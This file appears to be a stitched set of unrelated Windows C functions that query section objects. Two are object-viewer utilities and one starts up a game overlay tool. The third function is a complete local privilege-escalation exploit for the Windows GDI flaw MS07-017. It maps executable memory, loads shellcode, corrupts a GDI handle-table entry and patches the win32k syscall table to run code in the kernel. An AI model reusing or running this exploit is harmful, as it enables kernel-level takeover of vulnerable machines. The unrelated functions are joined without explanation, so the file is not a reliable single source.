/* * propBasicQuerySection * * Purpose: * * Set information values for Section object type * * If ExtendedInfoAvailable is FALSE then it calls propSetDefaultInfo to set Basic page properties * */ VOID propBasicQuerySection( _In_ PROP_OBJECT_INFO *Context, _In_ HWND hwndDlg, _In_ BOOL ExtendedInfoAvailable ) { BOOL bSet; NTSTATUS status; HANDLE hObject; SIZE_T bytesNeeded; LPWSTR lpType; RECT rGB; WCHAR szBuffer[MAX_PATH * 2]; SECTION_BASIC_INFORMATION sbi; SECTION_IMAGE_INFORMATION sii; SetDlgItemText(hwndDlg, ID_SECTION_ATTR, T_CannotQuery); SetDlgItemText(hwndDlg, ID_SECTIONSIZE, T_CannotQuery); if (Context == NULL) { return; } // // Open Section object. // hObject = NULL; if (!propOpenCurrentObject(Context, &hObject, SECTION_QUERY)) { return; } //this is for specific mars warning, mars doesn't recognize __stosb intrinsics szBuffer[0] = 0; //query basic information RtlSecureZeroMemory(&sbi, sizeof(SECTION_BASIC_INFORMATION)); status = NtQuerySection(hObject, SectionBasicInformation, &sbi, sizeof(SECTION_BASIC_INFORMATION), &bytesNeeded); if (NT_SUCCESS(status)) { bSet = FALSE; RtlSecureZeroMemory(&szBuffer, sizeof(szBuffer)); if (sbi.AllocationAttributes & SEC_BASED) { _strcat(szBuffer, TEXT("Based")); bSet = TRUE; } if (sbi.AllocationAttributes & SEC_NO_CHANGE) { if (bSet) _strcat(szBuffer, TEXT(" + ")); _strcat(szBuffer, TEXT("NoChange")); bSet = TRUE; } if (sbi.AllocationAttributes & SEC_FILE) { if (bSet) _strcat(szBuffer, TEXT(" + ")); _strcat(szBuffer, TEXT("File")); bSet = TRUE; } if (sbi.AllocationAttributes & SEC_IMAGE) { if (bSet) _strcat(szBuffer, TEXT(" + ")); _strcat(szBuffer, TEXT("Image")); bSet = TRUE; } if (sbi.AllocationAttributes & SEC_RESERVE) { if (bSet) _strcat(szBuffer, TEXT(" + ")); _strcat(szBuffer, TEXT("Reserve")); bSet = TRUE; } if (sbi.AllocationAttributes & SEC_COMMIT) { if (bSet) _strcat(szBuffer, TEXT(" + ")); _strcat(szBuffer, TEXT("Commit")); bSet = TRUE; } if (sbi.AllocationAttributes & SEC_NOCACHE) { if (bSet) _strcat(szBuffer, TEXT(" + ")); _strcat(szBuffer, TEXT("NoCache")); bSet = TRUE; } if (sbi.AllocationAttributes & SEC_GLOBAL) { if (bSet) _strcat(szBuffer, TEXT(" + ")); _strcat(szBuffer, TEXT("Global")); bSet = TRUE; } if (sbi.AllocationAttributes & SEC_LARGE_PAGES) { if (bSet) _strcat(szBuffer, TEXT(" + ")); _strcat(szBuffer, TEXT("LargePages")); } SetDlgItemText(hwndDlg, ID_SECTION_ATTR, szBuffer); //Size RtlSecureZeroMemory(&szBuffer, sizeof(szBuffer)); wsprintf(szBuffer, TEXT("0x%I64X"), sbi.MaximumSize.QuadPart); SetDlgItemText(hwndDlg, ID_SECTIONSIZE, szBuffer); //query image information if ((sbi.AllocationAttributes & SEC_IMAGE) && (sbi.AllocationAttributes & SEC_FILE)) { RtlSecureZeroMemory(&sii, sizeof(SECTION_IMAGE_INFORMATION)); status = NtQuerySection(hObject, SectionImageInformation, &sii, sizeof(SECTION_IMAGE_INFORMATION), &bytesNeeded); if (NT_SUCCESS(status)) { //show hidden controls if (GetWindowRect(GetDlgItem(hwndDlg, ID_IMAGEINFO), &rGB)) { EnumChildWindows(hwndDlg, supEnumEnableChildWindows, (LPARAM)&rGB); } //Entry RtlSecureZeroMemory(&szBuffer, sizeof(szBuffer)); wsprintf(szBuffer, TEXT("0x%I64X"), (ULONG_PTR)sii.TransferAddress); SetDlgItemText(hwndDlg, ID_IMAGE_ENTRY, szBuffer); //Stack Reserve RtlSecureZeroMemory(&szBuffer, sizeof(szBuffer)); wsprintf(szBuffer, TEXT("0x%I64X"), sii.MaximumStackSize); SetDlgItemText(hwndDlg, ID_IMAGE_STACKRESERVE, szBuffer); //Stack Commit RtlSecureZeroMemory(&szBuffer, sizeof(szBuffer)); wsprintf(szBuffer, TEXT("0x%I64X"), sii.CommittedStackSize); SetDlgItemText(hwndDlg, ID_IMAGE_STACKCOMMIT, szBuffer); //Executable SetDlgItemText(hwndDlg, ID_IMAGE_EXECUTABLE, (sii.ImageContainsCode) ? TEXT("Yes") : TEXT("No")); //Subsystem lpType = TEXT("Unknown"); switch (sii.SubSystemType) { case IMAGE_SUBSYSTEM_NATIVE: lpType = TEXT("Native"); break; case IMAGE_SUBSYSTEM_WINDOWS_GUI: lpType = TEXT("Windows GUI"); break; case IMAGE_SUBSYSTEM_WINDOWS_CUI: lpType = TEXT("Windows Console"); break; case IMAGE_SUBSYSTEM_OS2_CUI: lpType = TEXT("OS/2 Console"); break; case IMAGE_SUBSYSTEM_POSIX_CUI: lpType = TEXT("Posix Console"); break; case IMAGE_SUBSYSTEM_XBOX: lpType = TEXT("XBox"); break; case IMAGE_SUBSYSTEM_EFI_APPLICATION: lpType = TEXT("EFI Application"); break; case IMAGE_SUBSYSTEM_EFI_BOOT_SERVICE_DRIVER: lpType = TEXT("EFI Boot Service Driver"); break; case IMAGE_SUBSYSTEM_EFI_RUNTIME_DRIVER: lpType = TEXT("EFI Runtime Driver"); break; case IMAGE_SUBSYSTEM_WINDOWS_BOOT_APPLICATION: lpType = TEXT("Windows Boot Application"); break; } SetDlgItemText(hwndDlg, ID_IMAGE_SUBSYSTEM, lpType); //Major Version RtlSecureZeroMemory(&szBuffer, sizeof(szBuffer)); ultostr(sii.SubSystemMajorVersion, _strend(szBuffer)); SetDlgItemText(hwndDlg, ID_IMAGE_MJV, szBuffer); //Minor Version RtlSecureZeroMemory(&szBuffer, sizeof(szBuffer)); ultostr(sii.SubSystemMinorVersion, _strend(szBuffer)); SetDlgItemText(hwndDlg, ID_IMAGE_MNV, szBuffer); } } } // // Query object basic and type info if needed. // if (ExtendedInfoAvailable == FALSE) { propSetDefaultInfo(Context, hwndDlg, hObject); } NtClose(hObject); }
INT32 __stdcall start( ) { HANDLE sectionHandle, *hMutex; HANDLE eventHandle; HANDLE threadHandle; DWORD sectionSize; MSG messages; OBJECT_ATTRIBUTES objAttrib = {0}; PTEB threadEnvironmentBlock; UNICODE_STRING eventSource; LDR_DATA_TABLE_ENTRY *module; SECTION_BASIC_INFORMATION sectionInfo; LARGE_INTEGER newSectionSize; InitializeCRT(); threadEnvironmentBlock = NtCurrentTeb(); PushProcessId = threadEnvironmentBlock->ClientId.UniqueProcess; PushHeapHandle = threadEnvironmentBlock->ProcessEnvironmentBlock->ProcessHeap; PushSessionId = threadEnvironmentBlock->ProcessEnvironmentBlock->SessionId; // Check if already running hMutex = CreateMutexW(0, FALSE, L"PushOneInstance"); if (threadEnvironmentBlock->LastErrorValue == ERROR_ALREADY_EXISTS || threadEnvironmentBlock->LastErrorValue == ERROR_ACCESS_DENIED) { MessageBoxW(0, L"Only one instance!", 0,0); ExitProcess(0); } //create image event eventHandle = NULL; UnicodeString_Init(&eventSource, L"Global\\" PUSH_IMAGE_EVENT_NAME); objAttrib.Length = sizeof(OBJECT_ATTRIBUTES); objAttrib.RootDirectory = BaseGetNamedObjectDirectory(); objAttrib.ObjectName = &eventSource; objAttrib.Attributes = OBJ_OPENIF; objAttrib.SecurityDescriptor = NULL; objAttrib.SecurityQualityOfService = NULL; NtCreateEvent(&eventHandle, EVENT_ALL_ACCESS, &objAttrib, NotificationEvent, FALSE); // populate file name and path module = (LDR_DATA_TABLE_ENTRY*)threadEnvironmentBlock->ProcessEnvironmentBlock->Ldr->InLoadOrderModuleList.Flink; Memory_Copy(PushFilePath, module->FullDllName.Buffer, module->FullDllName.Length); PushFilePath[module->FullDllName.Length] = L'\0'; // Start Driver. Driver_Extract(); PushDriverLoaded = Driver_Load(); //initialize instance PushInstance = Module_GetHandle(L"Push.exe"); // Create interface MwCreateMainWindow(); // Create section. sectionSize = sizeof(PUSH_SHARED_MEMORY) + OSD_GetSize(); PushSharedMemory = (PUSH_SHARED_MEMORY*)Memory_MapViewOfSection(PUSH_SECTION_NAME, sectionSize, §ionHandle); if (!PushSharedMemory) { Log(L"Could not create shared memory"); return 0; } Log(L"Created section of size %i bytes", sectionSize); //zero struct Memory_Clear(PushSharedMemory, sizeof(PUSH_SHARED_MEMORY)); //initialize window handle used by overlay //PushSharedMemory->WindowHandle = PushMainWindow->Handle; //initialize default font properties for overlay String_Copy(PushSharedMemory->FontName, L"Verdana"); PushSharedMemory->FontBold = TRUE; if (File_Exists(PUSH_SETTINGS_FILE)) { wchar_t *buffer; wchar_t marker; // Check if file is UTF-16LE. buffer = (WCHAR*) File_Load(PUSH_SETTINGS_FILE, NULL); marker = buffer[0]; Memory_Free(buffer); if (marker == 0xFEFF) //is UTF-LE. { // Init settings from ini file. buffer = Memory_Allocate(100 * sizeof(WCHAR)); Ini_GetString(L"Settings", L"FrameLimit", NULL, buffer, 5, L".\\" PUSH_SETTINGS_FILE); PushSharedMemory->FrameLimit = _wtoi(buffer); if (Ini_ReadBoolean(L"Settings", L"ThreadOptimization", FALSE, L".\\" PUSH_SETTINGS_FILE)) PushSharedMemory->ThreadOptimization = TRUE; if (Ini_ReadBoolean(L"Settings", L"KeepFps", FALSE, L".\\" PUSH_SETTINGS_FILE)) PushSharedMemory->KeepFps = TRUE; Ini_GetString(L"Settings", L"OverlayInterface", NULL, buffer, 5, L".\\" PUSH_SETTINGS_FILE); if (String_Compare(buffer, L"PURE") == 0) PushOverlayInterface = OVERLAY_INTERFACE_PURE; else if (String_Compare(buffer, L"RTSS") == 0) PushOverlayInterface = OVERLAY_INTERFACE_RTSS; Ini_GetString(L"Settings", L"KeyboardHookType", L"AUTO", buffer, 10, L".\\" PUSH_SETTINGS_FILE); if (String_Compare(buffer, L"AUTO") == 0) { PushSharedMemory->KeyboardHookType = KEYBOARD_HOOK_AUTO; } else if (String_Compare(buffer, L"SUBCLASS") == 0) { PushSharedMemory->KeyboardHookType = KEYBOARD_HOOK_SUBCLASS; } else if (String_Compare(buffer, L"MESSAGE") == 0) { PushSharedMemory->KeyboardHookType = KEYBOARD_HOOK_MESSAGE; } else if (String_Compare(buffer, L"KEYBOARD") == 0) { PushSharedMemory->KeyboardHookType = KEYBOARD_HOOK_KEYBOARD; } else if (String_Compare(buffer, L"DETOURS") == 0) { PushSharedMemory->KeyboardHookType = KEYBOARD_HOOK_DETOURS; } else if (String_Compare(buffer, L"RAW") == 0) { PushSharedMemory->KeyboardHookType = KEYBOARD_HOOK_RAW; } else { PushSharedMemory->KeyboardHookType = KEYBOARD_HOOK_AUTO; } Ini_GetString(L"Settings", L"EngineClockMax", NULL, buffer, 5, L".\\" PUSH_SETTINGS_FILE); PushSharedMemory->HarwareInformation.DisplayDevice.EngineOverclock = _wtoi(buffer); Ini_GetString(L"Settings", L"MemoryClockMax", NULL, buffer, 5, L".\\" PUSH_SETTINGS_FILE); PushSharedMemory->HarwareInformation.DisplayDevice.MemoryOverclock = _wtoi(buffer); Ini_GetString(L"Settings", L"ControllerTimeout", NULL, buffer, 5, L".\\" PUSH_SETTINGS_FILE); PushSharedMemory->ControllerTimeout = _wtoi(buffer); Ini_GetString(L"Settings", L"FontName", L"Verdana", buffer, 100, L".\\" PUSH_SETTINGS_FILE); String_Copy(PushSharedMemory->FontName, buffer); Memory_Free(buffer); if (Ini_ReadBoolean(L"Settings", L"FontBold", FALSE, L".\\" PUSH_SETTINGS_FILE)) PushSharedMemory->FontBold = TRUE; } else { MessageBoxW( NULL, L"Settings file not UTF-16LE! " L"Resave the file as \"Unicode\" or Push won't read it!", L"Bad Settings file", NULL ); } } if (!PushDriverLoaded) { wchar_t driverPath[260]; Resource_Extract(L"DRIVERALT", L"WinRing0x64.sys"); GetDriverPath(L"WinRing0x64.sys", driverPath); Wr0DriverLoaded = Wr0Initialize(driverPath); } //initialize HWInfo GetHardwareInfo(); //initialize OSD items NtQuerySection( sectionHandle, SectionBasicInformation, §ionInfo, sizeof(SECTION_BASIC_INFORMATION), NULL ); newSectionSize.QuadPart = OSD_Initialize() + sizeof(PUSH_SHARED_MEMORY); if (newSectionSize.QuadPart > sectionInfo.MaximumSize.QuadPart) { Log(L"Shared memory too small!"); } //Check for controllers/gamepads/bluetooth adapters //EnumerateDevices(); // Check for running games Process_EnumProcesses(ProcessEnum); // Activate process monitoring if (PushDriverLoaded) { PushToggleProcessMonitoring(TRUE); } else { HANDLE overlayLib = NULL; void* prcAddress = 0; Resource_Extract(L"OVERLAY32", PUSH_LIB_NAME_32); overlayLib = Module_Load(L"overlay32.dll"); prcAddress = Module_GetProcedureAddress(overlayLib, "InstallOverlayHook"); if (prcAddress) { InstallOverlayHook = (TYPE_InstallOverlayHook)prcAddress; InstallOverlayHook(); } } g_szPrevGame[5] = '\0'; NtCreateThreadEx( &PushMonitorThreadHandle, THREAD_ALL_ACCESS, NULL, NtCurrentProcess(), &MonitorThread, NULL, NoThreadFlags, 0, 0, 0, NULL ); NtCreateThreadEx( &threadHandle, THREAD_ALL_ACCESS, NULL, NtCurrentProcess(), &PipeThread, NULL, NoThreadFlags, 0, 0, 0, NULL ); // Handle messages while(GetMessageW(&messages, 0,0,0)) { TranslateMessage(&messages); DispatchMessageW(&messages); } ExitProcess(0); return 0; }
int main(int argc, char* argv[]) { ULONG i, PID, Status, Old; LPVOID lpMapAddress=NULL; HANDLE hMapFile=(HANDLE)0x10; GDITableEntry *gdiTable; SECTION_BASIC_INFORMATION SBI; WORD Upr; ULONG Size=0x1000; PVOID Addr=(PVOID)0x2; printf("Windows GDI MS07-017 Local Privilege Escalation Exploit\nBy Ivanlef0u\n" "http://ivanlef0u.free.fr\n" "Be MAD!\n"); //allocate memory at addresse 0x2 Status=NtAllocateVirtualMemory((HANDLE)-1, &Addr, 0, &Size, MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN, PAGE_EXECUTE_READWRITE); if(Status) printf("Error with NtAllocateVirtualMemory : 0x%x\n", Status); else printf("Addr : 0x%x OKAY\n", Addr); memcpy(Addr, Shellcode, sizeof(Shellcode)); printf("win32.sys base : 0x%x\n", GetWin32kBase()); ULONG Win32kSST=GetWin32kBase()+0x198300; //range between win32k imagebase and it's SSDT printf("SSDT entry : 0x%x\n", Win32kSST); //win32k!NtGdiAbortDoc HBRUSH hBr; hBr=CreateSolidBrush(0); Upr=(WORD)((DWORD)hBr>>16); printf("0x%x\n", Upr); while(!lpMapAddress) { hMapFile=(HANDLE)((ULONG)hMapFile+1); lpMapAddress=MapViewOfFile(hMapFile, FILE_MAP_ALL_ACCESS, 0, 0, 0); } if(lpMapAddress==NULL) { printf("Error with MapViewOfFile : %d\n", GetLastError()); return 0; } Status=NtQuerySection(hMapFile, SectionBasicInformation, &SBI, sizeof(SECTION_BASIC_INFORMATION), 0); if (Status) //!=STATUS_SUCCESS (0) { printf("Error with NtQuerySection (SectionBasicInformation) : 0x%x\n", Status); return 0; } printf("Handle value : %x\nMapped address : 0x%x\nSection size : 0x%x\n\n", hMapFile, lpMapAddress, SBI.Size.QuadPart); gdiTable=(GDITableEntry *)lpMapAddress; PID=GetCurrentProcessId(); for (i=0; i<SBI.Size.QuadPart; i+=sizeof(GDITableEntry)) { if(gdiTable->ProcessID==PID && gdiTable->nUpper==Upr) //only our GdiTable and brush { printf("gdiTable : 0x%x\n", gdiTable); printf("pKernelInfo : 0x%x\n", gdiTable->pKernelInfo); printf("ProcessID : %d\n", gdiTable->ProcessID); printf("_nCount : %d\n", gdiTable->_nCount); printf("nUpper : 0x%x\n", gdiTable->nUpper); printf("nType : 0x%x\n", gdiTable->nType ); printf("pUserInfo : 0x%x\n\n", gdiTable->pUserInfo); Old=gdiTable->pKernelInfo; gdiTable->pKernelInfo=(ULONG)buff; //crafted buff break; } gdiTable++; } if(!DeleteObject(hBr)) printf("Error with DeleteObject : %d\n", GetLastError()); else printf("Done\n"); printf("Buff : 0x%x\n", buff); memset(buff, 0x90, sizeof(buff)); buff[0]=0x1; //!=0 buff[0x24/4]=Win32kSST; //syscall to modifY buff[0x4C/4]=0x804D7000; //kernel base, just for avoiding bad mem ptr if(!DeleteObject(hBr)) printf("Error with DeleteObject : %d\n", GetLastError()); gdiTable->pKernelInfo=Old; //restore old value /* lkd> uf GDI32!NtGdiAbortDoc GDI32!NtGdiAbortDoc: 77f3073a b800100000 mov eax,1000h 77f3073f ba0003fe7f mov edx,offset SharedUserData!SystemCallStub (7ffe0300) 77f30744 ff12 call dword ptr [edx] 77f30746 c20400 ret 4 */ __asm { mov eax, 0x1000 mov edx,0x7ffe0300 call dword ptr [edx] } return 0; }
/* * supQuerySectionFileInfo * * Purpose: * * Query section object type File + Image description from version info block * */ BOOL supQuerySectionFileInfo( _In_opt_ HANDLE hRootDirectory, _In_ PUNICODE_STRING ObjectName, _Inout_ LPWSTR Buffer, _In_ DWORD ccBuffer //size of buffer in chars ) { HANDLE hSection; PVOID vinfo; LPWSTR pcValue, lpszFileName, lpszKnownDlls; LPTRANSLATE lpTranslate; SIZE_T cLength = 0; NTSTATUS status; DWORD dwHandle = 0, dwSize, dwInfoSize; BOOL bResult, cond = FALSE; OBJECT_ATTRIBUTES Obja; SECTION_BASIC_INFORMATION sbi; SECTION_IMAGE_INFORMATION sii; WCHAR szQueryBlock[MAX_PATH]; bResult = FALSE; if ( (ObjectName == NULL) || (Buffer == NULL) || (ccBuffer == 0) ) { return bResult; } vinfo = NULL; lpszFileName = NULL; hSection = NULL; lpszKnownDlls = NULL; do { //oleaut32.dll does not have FileDescription // open section with query access InitializeObjectAttributes(&Obja, ObjectName, OBJ_CASE_INSENSITIVE, hRootDirectory, NULL); status = NtOpenSection(&hSection, SECTION_QUERY, &Obja); if (!NT_SUCCESS(status)) break; // query section flags RtlSecureZeroMemory(&sbi, sizeof(sbi)); status = NtQuerySection(hSection, SectionBasicInformation, (PVOID)&sbi, sizeof(sbi), &cLength); if (!NT_SUCCESS(status)) break; // check if section is SEC_IMAGE | SEC_FILE if (!((sbi.AllocationAttributes & SEC_IMAGE) && (sbi.AllocationAttributes & SEC_FILE))) break; // check image machine type RtlSecureZeroMemory(&sii, sizeof(sii)); status = NtQuerySection(hSection, SectionImageInformation, (PVOID)&sii, sizeof(sii), &cLength); if (!NT_SUCCESS(status)) break; // select proper decoded KnownDlls path if (sii.Machine == IMAGE_FILE_MACHINE_I386) { lpszKnownDlls = g_lpKnownDlls32; } else if (sii.Machine == IMAGE_FILE_MACHINE_AMD64) { lpszKnownDlls = g_lpKnownDlls64; } // paranoid if (lpszKnownDlls == NULL) { RtlSecureZeroMemory(szQueryBlock, sizeof(szQueryBlock)); GetSystemDirectory(szQueryBlock, MAX_PATH); lpszKnownDlls = szQueryBlock; } // allocate memory buffer to store full filename // KnownDlls + \\ + Object->Name + \0 cLength = (_strlen(lpszKnownDlls) * sizeof(WCHAR)) + (_strlen(ObjectName->Buffer) * sizeof(WCHAR)) + 2 * sizeof(WCHAR); lpszFileName = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, cLength); if (lpszFileName == NULL) break; // construct target filepath _strcpy(lpszFileName, lpszKnownDlls); _strcat(lpszFileName, L"\\"); _strcat(lpszFileName, ObjectName->Buffer); // query size of version info dwSize = GetFileVersionInfoSize(lpszFileName, &dwHandle); if (dwSize == 0) break; // allocate memory for version_info structure vinfo = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, dwSize); if (vinfo == NULL) break; // query it from file if (!GetFileVersionInfo(lpszFileName, 0, dwSize, vinfo)) break; // query codepage and language id info if (!VerQueryValue(vinfo, VERSION_TRANSLATION, &lpTranslate, (PUINT)&dwInfoSize)) break; if (dwInfoSize == 0) break; // query filedescription from file with given codepage & language id RtlSecureZeroMemory(szQueryBlock, sizeof(szQueryBlock)); wsprintf(szQueryBlock, VERSION_DESCRIPTION, lpTranslate[0].wLanguage, lpTranslate[0].wCodePage); // finally query pointer to version_info filedescription block data pcValue = NULL; dwInfoSize = 0; bResult = VerQueryValue(vinfo, szQueryBlock, &pcValue, (PUINT)&dwInfoSize); if (bResult) { _strncpy(Buffer, ccBuffer, pcValue, dwInfoSize); } } while (cond); if (hSection) NtClose(hSection); if (vinfo) HeapFree(GetProcessHeap(), 0, vinfo); if (lpszFileName) HeapFree(GetProcessHeap(), 0, lpszFileName); return bResult; }